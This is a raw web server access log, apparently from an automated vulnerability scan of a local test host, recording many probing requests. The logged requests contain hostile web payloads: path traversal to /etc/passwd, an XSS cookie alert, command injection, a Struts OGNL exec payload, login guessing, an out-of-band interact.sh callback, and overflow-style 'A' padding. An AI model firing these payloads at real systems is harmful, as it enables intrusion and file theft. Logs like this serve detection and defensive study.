AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://interact.sh/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Forms/rpAuth_1?id=
HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal/fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/out HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/credentials.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/app/something/services/AppModule.class/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"username=apollo&password=admin&login-submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /signin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1/signin?", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA